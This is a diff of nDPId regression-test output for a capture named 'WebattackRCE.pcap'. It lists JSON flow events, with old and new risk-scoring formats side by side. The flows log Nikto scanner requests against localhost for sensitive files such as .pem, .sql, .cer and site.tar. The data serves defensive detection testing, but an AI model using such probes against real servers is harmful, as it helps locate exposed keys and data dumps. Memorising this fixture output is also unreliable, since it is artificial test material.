-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1576420276860,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276860,"pkt":"AAAAAAAAAAAAAAAACABFAADALy9AAEAGDQd\/AAABfwAAAcJ8H5ChphcTD1c5UYAYAED+tAAAAQEICp1m+6SdZvukR0VUIC8xMjcwLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1576420276862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420276862,"pkt":"AAAAAAAAAAAAAAAACABFAAC9dyVAAEAGxRN\/AAABfwAAAcJ+H5ApDE8dFFMQVIAYAED+sQAAAQEICp1m+6WdZvulR0VUIC8xLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1576420276863,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420276863,"pkt":"AAAAAAAAAAAAAAAACABFAAC9pJxAAEAGl5x\/AAABfwAAAcKAH5APfJymg2qZ5YAYAED+sQAAAQEICp1m+6edZvumR0VUIC8xLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1576420276864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420276864,"pkt":"AAAAAAAAAAAAAAAACABFAADBqoBAAEAGkbR\/AAABfwAAAcKCH5Cxx5I\/tyTjW4AYAED+tQAAAQEICp1m+6idZvuoR0VUIC8xMjcuMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1576420276865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420276865,"pkt":"AAAAAAAAAAAAAAAACABFAADBsWVAAEAGis9\/AAABfwAAAcKEH5CGGYkkbARgroAYAED+tQAAAQEICp1m+6mdZvupR0VUIC8xMjcuMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1576420276866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420276866,"pkt":"AAAAAAAAAAAAAAAACABFAADBsTlAAEAGivt\/AAABfwAAAcKGH5CzxIl4Ool\/aIAYAED+tQAAAQEICp1m+6qdZvuqR0VUIC8xMjcuMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1576420276869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420276869,"pkt":"AAAAAAAAAAAAAAAACABFAADBxdFAAEAGdmN\/AAABfwAAAcKIH5BDzv2PC6KyZoAYAED+tQAAAQEICp1m+6ydZvusR0VUIC8xMjcuMC5wZW0gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1576420276870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276870,"pkt":"AAAAAAAAAAAAAAAACABFAADAIL1AAEAGG3l\/AAABfwAAAcKKH5D\/Dxj7MLgvIIAYAED+tAAAAQEICp1m+66dZvuuR0VUIC9zaXRlLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
